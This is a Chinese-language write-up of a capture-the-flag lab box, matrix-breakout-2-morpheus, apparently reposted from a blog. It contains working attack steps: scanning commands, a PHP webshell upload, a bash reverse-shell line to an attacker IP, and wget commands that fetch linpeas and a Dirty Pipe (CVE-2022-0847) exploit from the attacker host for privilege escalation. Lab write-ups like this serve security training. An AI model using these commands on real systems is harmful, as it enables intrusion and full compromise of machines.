一、信息收集 命令:netdiscover -i eth0 -r 192.168.236.0/24 访问网页,没有发现任何信息 命令:nmap -sV -T4 -A 192.168.236.151
命令:netdiscover -i eth0 -r 192.168.236.0/24
访问网页,没有发现任何信息
命令:nmap -sV -T4 -A 192.168.236.151
发现开放22、80端口
22端口:ssh密码爆破
80端口:网页(没有信息)
81端口:自定义端口号
尝试一些弱口令未进入
命令:dirb Http://192.168.236.151/
http://192.168.236.151/robots.txt 没有发现任何信息
http://192.168.236.151/javascript/Jquery/jquery 也没有发现任何信息
再使用更厉害的目录扫描工具:Gobuster
命令:gobuster dir -u http://192.168.1.35 -w /usr/share/Wordlists/dirbuster/directory-list-2.3-medium.txt -x .PHP,.txt,.html,.zip
访问:http://192.168.236.151/graffiti.php
访问:http://192.168.236.151/graffiti.txt 没有其他信息
针对http://192.168.236.151/graffiti.php
发现上传什么,就会保存为为什么
message为一句话木马的url编码,这里我们利用burp抓包修改为attack.php上传:
上传成功,利用蚁剑连接,url:http://192.168.236.151/attack.php 密码:attack
连接成功
打开蚁剑中的终端:低权限
命令:& /dev/tcp/192.168.236.128/4444 0>&1'"); ?>
这里在网页中上传反弹shell命令,另存为fuck.php
kali监听4444端口,网页访问:http://192.168.236.151/fuck.php
监听成功,但是低权限
这里使用一种新的工具,可在内网中扫描内网主机的信息,包括IP,存在的漏洞等敏感信息
linux提权脚本:linpeas
枚举linux操作系统几乎所有的可提权项
首先下载至kali机:利用wget命令进行下载
kali机开启http服务:python3 -m http.server 8080
在被攻击机中利用wget下载:
命令:wget http://192.168.236.128:8080/linpeas_linux_amd64
下载成功
先赋权,再执行:
命令:chmod +x linpeas_linux_amd64
命令:./linpeas_linux_amd64
扫描信息包括可能存在的漏洞,系统版本,网卡信息等
这里使用: CVE-2022-0847进行提权
首先下载:命令:git clone https://GitHub.com/imfiver/CVE-2022-0847.git
被攻击机利用wget,下载kali上的可执行文件:
命令:wget http://192.168.236.128:8080/CVE-2022-0847/Dirty-Pipe.sh
下载成功
先赋权,再执行Dirty-Pipe.sh
提权成功
除了dirb扫描目录,还要学会gobuster ffuf工具进行强力的目录扫描
ffuf扫描:ffuf -u http://IP/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
2、linux内网强力扫描工具:linpeas工具的使用
来源地址:https://blog.csdn.net/weixin_46411728/article/details/129034062
--结束END--
本文标题: 【matrix-breakout-2-morpheus】靶场记录
本文链接: https://lsjlt.com/news/393186.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0